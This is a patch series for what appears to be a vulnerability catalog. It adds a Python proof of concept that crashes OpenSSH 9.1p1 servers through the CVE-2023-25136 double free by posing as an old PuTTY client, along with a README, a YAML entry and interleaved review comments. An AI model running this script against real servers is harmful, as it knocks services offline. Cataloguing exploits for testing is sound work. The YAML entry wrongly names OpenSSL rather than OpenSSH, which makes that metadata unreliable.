From e563241c4d6cdc8fd14c4382eaf571c454228ad5 Mon Sep 17 00:00:00 2001
From: xuwenhan
Date: Wed, 8 Mar 2023 19:03:51 +0800
Subject: [PATCH 1/2] add CVE-2023-25136
---
 .../2023/CVE-2023-25136/CVE-2023-25136.py | 12 +++++++++
 cve/openssl/2023/CVE-2023-25136/README.md | 26 +++++++++++++++++++
 cve/openssl/2023/yaml/CVE-2023-25136.yaml | 21 +++++++++++++++
 3 files changed, 59 insertions(+)
 create mode 100644 cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py
 create mode 100644 cve/openssl/2023/CVE-2023-25136/README.md
 create mode 100644 cve/openssl/2023/yaml/CVE-2023-25136.yaml
diff --git a/cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py b/cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py
new file mode 100644
index 00000000..b0a37cce
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-25136/CVE-2023-25136.py
@@ -0,0 +1,12 @@
+import paramiko
+
+VICTIM_IP = "127.0.0.1"
+CLIENT_ID = "PuTTY_Release_0.64"
+
+def main():
+ transport = paramiko.Transport(VICTIM_IP)
+ transport.local_version = f"SSH-2.0-{CLIENT_ID}"
+ transport.connect(username='', password='')
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/cve/openssl/2023/CVE-2023-25136/README.md b/cve/openssl/2023/CVE-2023-25136/README.md
new file mode 100644
index 00000000..5166c9ee
--- /dev/null
+++ b/cve/openssl/2023/CVE-2023-25136/README.md
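Review bot: `VICTIM_IP` is a hard-coded module constant and `paramiko.Transport(VICTIM_IP)` receives a bare hostname, so pointing the PoC at a lab host means editing the source and a test server on a non-default port cannot be addressed at all; reading the target from the command line (`import sys` plus `VICTIM_IP = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"`) and passing a `(host, port)` tuple to `Transport` would cover both. The transport is also never released: when `connect` fails after the server drops the session (this typically surfaces as a `paramiko.SSHException`) the script exits with a raw traceback and leaves the socket to the garbage collector, so the `connect` call belongs in a `try/finally` that calls `transport.close()`. Note too that the README in this same commit documents the run command as `python cve-2023-25136.py` while the file is added as `CVE-2023-25136.py`, which fails on case-sensitive filesystems.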
@@ -0,0 +1,26 @@
+# CVE-2023-25136 Proof-of-Concept
+
+### Overview
+
+This is a DoS Proof-of-Concept of OpenSSH 9.1p1 Double-Free Vulnerability CVE-2023-25136.
+It will trigger the double-free and cause an abort crash.
+For a comprehensive understanding, check out the accompanying [blog post](https://jfrog.com/blog/openssh-pre-auth-double-free-cve-2023-25136-writeup-and-proof-of-concept/) for in-depth details.
+
+### Dependencies
+
+* Python 3.6+
+* `paramiko` Python Library
+
+### Usage
+
+1. Verify `paramiko` is installed:
+```
+pip install paramiko
+```
+
+2. Change the `VICTIM_IP` to match your vulnerable OpenSSH Server IP.
+
+3. Run the PoC:
+```
+python cve-2023-25136.py
+```
\ No newline at end of file
diff --git a/cve/openssl/2023/yaml/CVE-2023-25136.yaml b/cve/openssl/2023/yaml/CVE-2023-25136.yaml
new file mode 100644
index 00000000..6879369c
--- /dev/null
+++ b/cve/openssl/2023/yaml/CVE-2023-25136.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-25136
+source:
+ https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
+info:
+ name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
+ severity: medium
+ description: |
+ OpenSSH服务在针对putty老版本等客户端连接时做了兼容处理,导致compat_kex_proposal函数在options.kex_algorithms处理时存在双重释放漏洞。未经身份验证的攻击者可以触发双重释放,从而跳转到sshd地址空间的任意位置,可实现DoS攻击,理论上可执行任意代码。
+ scope-of-influence:
+ OpenSSL 9.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2023-25136
+ - https://github.com/openssh/openssh-portable/commit/486c4dc3b83b4b67d663fb0fa62bc24138ec3946
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
+ cvss-score: 6.5
+ cve-id: CVE-2023-25136
+ cwe-id: CWE-415
+ cnvd-id: None
+ kve-id: None
+ tags: 拒绝服务,DoS
\ No newline at end of file
-- Gitee
From 0750920444c2e2b3cac969304fcfdc46908e1247 Mon Sep 17 00:00:00 2001
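Review bot: The catalog entry names the wrong product: `name:` describes OpenSSL and `scope-of-influence:` reads `OpenSSL 9.1`, while the `description:` text, both `reference:` links (an openssh-portable commit and the NVD page) and the README in this commit all concern the OpenSSH 9.1 server (`compat_kex_proposal` in sshd). Change the scope line to `OpenSSH 9.1` and replace the `name:` text with a one-line description of OpenSSH rather than of OpenSSL. The file path `cve/openssl/2023/yaml/` and the `openssl:` list that PATCH 2/2 extends in openkylin_list.yaml carry the same misfiling, so a consumer filtering the catalog by product would miss this entry for OpenSSH installs and raise it against OpenSSL installs that are not affected.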
From: xuwenhan
Date: Wed, 8 Mar 2023 19:06:07 +0800
Subject: [PATCH 2/2] update openkylin_list.yaml for CVE-2023-25136
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 1c46ad09..1c5bc747 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -42,6 +42,7 @@ cve:
 - CVE-2022-2598
 openssl:
 - CVE-2022-1292
+ - CVE-2023-25136
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
-- Gitee